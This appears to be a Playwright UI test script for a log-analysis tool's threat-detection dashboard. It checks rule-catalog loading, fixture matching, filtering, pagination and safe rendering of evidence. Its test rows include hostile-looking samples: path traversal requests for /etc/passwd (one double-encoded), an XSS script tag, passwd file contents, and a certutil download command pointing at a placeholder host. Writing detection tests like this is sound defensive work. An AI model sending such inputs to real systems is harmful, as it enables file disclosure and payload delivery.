/* UI/catalog contract checks against local preview data, not the native scanner. */
import { chromium } from 'playwright';
import { existsSync, mkdirSync, readFileSync, writeFileSync } from 'node:fs';
import { resolve } from 'node:path';
import assert from 'node:assert/strict';

const browser = await chromium.launch({headless:true,...(!existsSync(chromium.executablePath()) ? {executablePath:'C:/Users/felip/AppData/Local/ms-playwright/chromium-1217/chrome-win64/chrome.exe'} : {})});
const page = await browser.newPage({viewport:{width:1440,height:1000}});
page.setDefaultTimeout(15000);
const errors=[];page.on('pageerror',error=>errors.push(String(error)));
const output=resolve('output/playwright');mkdirSync(output,{recursive:true});
const fixtures=JSON.parse(readFileSync('src-tauri/resources/threat-examples.json','utf8'));
const expectedCatalog=JSON.parse(readFileSync('src-tauri/resources/threat-rules.json','utf8'));
const expectedEnabled=expectedCatalog.rules.filter(rule=>rule.enabled).length;
const previewUrl=process.argv[2]||process.env.PREVIEW_URL||'http://127.0.0.1:4175';
const result={url:previewUrl};
const ready=()=>page.waitForFunction(()=>!!document.querySelector('.threat-summary')&&!document.querySelector('.discovery-loading'));
const close=()=>page.evaluate(()=>closeDrawer());
try {
  await page.goto(previewUrl);
  await page.waitForFunction(()=>state.loaded&&state.total===6000);
  result.catalog=await page.evaluate(async()=>{
    const catalog=await api('threat_catalog',{});
    return {rules:catalog.rules.length,enabled:catalog.enabled,categories:catalog.categories.length};
  });
  assert.equal(result.catalog.rules,expectedCatalog.rules.length);
  assert(result.catalog.rules>=350,'Expanded catalog covers at least 350 signatures');
  assert.equal(result.catalog.enabled,expectedEnabled);
  result.fixtureChecks=await page.evaluate(async fixtures=>{
    let positive=0;
    for(const sample of [...fixtures.positive,...fixtures.normalizedPositive]){
      const response=await api('threat_events',{filters:[{column:'_all',op:'threat_rule',value:sample.id}],caseEvents:[{id:0,event_ref:'fixture',timestamp:null,source:'Test',level:'',code:'',name:'',description:'',message:sample.text,raw:'',fields:{}}]});
      if(response.total!==1)throw new Error(`Missing fixture match: ${sample.id}`);positive++;
    }
    const benign=await api('threat_scan',{filters:[],caseEvents:fixtures.benign.map((message,id)=>({id,event_ref:`benign:${id}`,timestamp:null,source:'Test',level:'',code:'',name:'',description:'',message,raw:'',fields:{}}))});
    if(benign.matched)throw new Error(`Benign matches ${benign.matched}`);
    return {positive,benign:fixtures.benign.length};
  },fixtures);
  result.passwdOutput=await page.evaluate(async()=>{
    const row=message=>({id:0,event_ref:'passwd-check',timestamp:null,source:'HTTP',level:'',code:'200',name:'Response',description:'',message,raw:'',fields:{}});
    const filters=[{column:'_all',op:'threat_rule',value:'response.host.passwd'}];
    const output=await api('threat_events',{filters,caseEvents:[row('root:x:0:0:root:/root:/bin/bash')]});
    const pathOnly=await api('threat_events',{filters,caseEvents:[row('/etc/passwd')]});
    return {outputMatches:output.total,pathOnlyMatches:pathOnly.total};
  });
  assert.deepEqual(result.passwdOutput,{outputMatches:1,pathOnlyMatches:0});
  await page.evaluate(async()=>{
    const start=Date.UTC(2026,8,23,0,0,0);
    const rows=Array.from({length:65},(_,id)=>({id,event_ref:`threat:${id}`,timestamp:id===64?null:start+id*1000+(id>=30?50000:0),source:id%2?'api':'API',level:'Aviso',code:'GET',name:'Requisição',description:'',message:id<60?'GET /?file=../../../../etc/passwd':'Ordinary request',raw:'',fields:{request_id:`req-${id}`}}));
    rows[60].message='GET /?payload=<script>alert("preview")</script>';
    rows[61].message='GET /?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd';
    rows[62].message='';rows[62].fields.CommandLine='C:\\Windows\\System32\\certutil.exe -urlcache -split -f https://example.test/sample.bin';
    rows[63].message='root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin';
    rows[64].message='GET /?file=../../../../etc/passwd';
    activeCase().items=[{id:'threat-case',name:'Threat fixture',kind:'events',rows,sourceFilters:[],tags:[]}];
    state.stationAnalyticsId=null;state.filters=[];caseEventsCache.sig=null;Discovery.clearCache();
    if(window.WorkspaceContext)await WorkspaceContext.setScope('case',{page:'explore',tab:'dashboard',animate:false});
    else switchView('case-dashboard');
    window.__threatApi=api;window.__threatRequests=[];
    api=async(command,args,options)=>{if(command==='threat_events')window.__threatRequests.push(args);return window.__threatApi(command,args,options);};
  });
  await page.getByRole('button',{name:'Ameaças',exact:true}).click();await ready();
  result.summary=await page.locator('#dash-info').innerText();
  assert.match(result.summary,/65 examinados/);
  assert((await page.locator('.threat-rule').count())>=3);
  assert.match(await page.locator('.threat-rule-list').innerText(),new RegExp(expectedCatalog.rules.find(rule=>rule.id==='response.host.passwd').name.replace(/[.*+?^${}()|[\]\\]/g,'\\$&')));
  await page.getByLabel('Tipo de sinal').selectOption('response');
  assert(await page.locator('.threat-rule small').evaluateAll(nodes=>nodes.length>0&&nodes.every(node=>node.textContent.endsWith(' · Resposta'))),'Response selector excludes attempts and indicators');
  await page.getByLabel('Tipo de sinal').selectOption('');
  result.responseTypeFilter=true;
  assert.match(await page.locator('.threat-undated').innerText(),/1 registro sem horário/);
  assert((await page.locator('.threat-time-bin:disabled').count())>0);
  assert(await page.locator('.threat-time-bin:disabled').evaluateAll(nodes=>nodes.every(node=>node.getBoundingClientRect().height===0)),'Zero buckets have no visible bar');
  assert(await page.locator('.threat-time-bin:enabled').evaluateAll(nodes=>nodes.every(node=>node.getBoundingClientRect().height>0)),'Nonzero buckets remain visible');
  result.undatedAndZeroBuckets=true;
  assert.equal(await page.evaluate(async()=>(await api('query_events',{filters:[],offset:0,limit:1})).total),6000,'Case fixture does not mutate loaded dataset');
  if(await page.evaluate(()=>!!window.WorkspaceContext)){
    assert.equal(await page.evaluate(()=>state.total),65,'Case context exposes only its selected records');
    await page.getByLabel('Tipo de sinal').selectOption('response');
    await page.getByLabel('Buscar regra encontrada').fill('passwd');
    await page.evaluate(()=>WorkspaceContext.setScope('dataset',{page:'explore',tab:'dashboard',animate:false}));
    await page.getByRole('button',{name:'Ameaças',exact:true}).click();await ready();
    assert.match(await page.locator('#dash-info').innerText(),/6\.000 examinados/);
    assert.equal(await page.evaluate(()=>state.total),6000);
    await page.evaluate(()=>WorkspaceContext.setScope('case',{page:'explore',tab:'dashboard',animate:false}));await ready();
    assert.equal(await page.getByLabel('Tipo de sinal').inputValue(),'response');
    assert.equal(await page.getByLabel('Buscar regra encontrada').inputValue(),'passwd');
    await page.getByLabel('Tipo de sinal').selectOption('');
    await page.getByLabel('Buscar regra encontrada').fill('');
    result.contextIsolation=true;
  }
  await page.getByRole('button',{name:'Ver registros',exact:true}).click();
  await page.waitForFunction(()=>document.querySelectorAll('.threat-record').length===50);
  assert.equal(await page.evaluate(()=>state.filters.length),0,'Inspector does not add a global filter');
  assert.equal(await page.evaluate(()=>window.__threatRequests.at(-1).filters.at(-1).value),'*');
  await page.locator('#drawer').getByRole('button',{name:'Próxima',exact:true}).click();
  await page.waitForFunction(()=>document.querySelector('#drawer .threat-pager')?.textContent.includes('2 / 2'));
  assert((await page.locator('.threat-record').count())>0);
  result.pagination=true;
  await close();
  await page.locator('.threat-time-bin').filter({hasText:''}).first().click();
  await page.waitForFunction(()=>!!document.querySelector('#drawer .threat-pager'));
  assert.equal(await page.evaluate(()=>window.__threatRequests.at(-1).filters.at(-1).column),'timestamp');
  assert.equal(await page.evaluate(()=>state.filters.length),0);
  await close();
  const origins=page.locator('.discovery-card').filter({has:page.getByRole('heading',{name:'Origens',exact:true})});
  await origins.locator('.threat-rank').filter({has:page.locator('span').filter({hasText:/^API$/})}).click();
  await page.waitForFunction(()=>!!document.querySelector('#drawer .threat-pager'));
  assert.deepEqual(await page.evaluate(()=>window.__threatRequests.at(-1).filters.at(-1)),{column:'source',op:'equals_exact',value:'API',value2:null});
  assert(await page.locator('.threat-record small').evaluateAll(nodes=>nodes.every(n=>n.textContent.endsWith(' · API'))),'Origin case sensitivity preserved');
  result.exactOrigin=true;
  await page.locator('.threat-record').first().click();
  await page.waitForFunction(()=>document.querySelector('#drawer')?.textContent.includes('GET /?file='));
  assert.equal(await page.locator('#dr-prev').isVisible(),false);
  assert.equal(await page.locator('.detail-quick-actions').isVisible(),false);
  await close();
  await page.getByLabel('Buscar regra encontrada').fill('script');
  await page.locator('.threat-rule').first().click();
  assert.equal(await page.locator('#drawer script').count(),0,'Evidence renders as text');
  assert.match(await page.locator('#drawer .threat-example').first().innerText(),/<script>/);
  result.safeEvidence=true;
  await close();
  await page.getByLabel('Buscar regra encontrada').fill('nonexistent fixture');
  assert.match(await page.locator('.threat-rule-list').innerText(),/Nenhuma regra/);
  await page.getByLabel('Buscar regra encontrada').fill('');
  await page.getByRole('button',{name:'Regras',exact:true}).click();
  assert.match(await page.locator('.threat-catalog').innerText(),new RegExp(`${expectedEnabled} regras ativas`));
  await close();
  await page.screenshot({path:resolve(output,'threats-case-1440.png')});
  await page.setViewportSize({width:1024,height:768});
  assert(await page.evaluate(()=>document.documentElement.scrollWidth<=innerWidth),'No page horizontal overflow');
  assert(await page.locator('.threat-bars').evaluate(node=>node.lastElementChild.getBoundingClientRect().right<=node.getBoundingClientRect().right+1),'Every timeline bucket fits the chart at 1024px');
  await page.locator('#btn-theme').click();
  await page.screenshot({path:resolve(output,'threats-case-light-1024.png')});
  await page.evaluate(()=>{activeCase().items[0].rows.push({id:100,event_ref:'clipped',timestamp:null,source:'Huge',message:'x'.repeat(70000),raw:'',fields:{}});caseEventsCache.sig=null;Discovery.clearCache();});
  await page.locator('#btn-dash-refresh').click();await ready();
  assert.match(await page.locator('#dash-grid > .threat-partial').innerText(),/Análise parcial/);
  result.partialVisible=true;
  await page.evaluate(catalog=>{
    const existing={...catalog.rules[0],name:'Minha regra preservada',enabled:false,pattern:'local-custom-pattern'};
    const custom={...catalog.rules[1],id:'user.custom',name:'Regra própria',pattern:'CUSTOM_ONLY_SENTINEL'};
    window.__preservedThreatRules=[existing,custom];
    window.__mockThreatCatalog={version:1,name:'Catálogo customizado',rules:[existing,custom]};Discovery.clearCache();
  },expectedCatalog);
  await page.locator('#btn-dash-refresh').click();await ready();
  await page.getByRole('button',{name:'Regras',exact:true}).click();
  await page.getByRole('button',{name:`Adicionar ${expectedCatalog.rules.length-1} regras novas`,exact:true}).click();
  await page.waitForFunction(count=>window.__mockThreatCatalog.rules.length===count+1,expectedCatalog.rules.length);
  await page.waitForFunction(()=>!!document.querySelector('.threat-catalog')&&!document.querySelector('.threat-catalog .btn.primary'));
  assert(await page.evaluate(()=>window.__preservedThreatRules.every(expected=>JSON.stringify(window.__mockThreatCatalog.rules.find(rule=>rule.id===expected.id))===JSON.stringify(expected))),'Additive update preserves disabled/custom rules exactly');
  assert.equal(await page.evaluate(()=>window.__mockThreatCatalog.name),'Catálogo customizado');
  await ready();
  assert.match(await page.locator('#dash-info').innerText(),/65|66/,'Update refreshes the current selection');
  result.additiveUpdatePreservesCustom=true;
  await close();
  await page.evaluate(()=>{window.__mockThreatCatalog={version:1,name:'Invalid fixture',rules:[],error:'Regex inválida na regra fixture.invalid'};Discovery.clearCache();});
  await page.locator('#btn-dash-refresh').click();
  await page.waitForFunction(()=>document.querySelector('#dash-grid .threat-error')?.textContent.includes('fixture.invalid'));
  result.catalogErrorVisible=true;
  assert.deepEqual(errors,[]);
  result.pageErrors=errors;
  writeFileSync(resolve(output,'threats-validation.json'),JSON.stringify(result,null,2));
  writeFileSync(resolve(output,`threats-validation-${new URL(previewUrl).port}.json`),JSON.stringify(result,null,2));
  console.log(JSON.stringify(result,null,2));
}finally{await browser.close();}
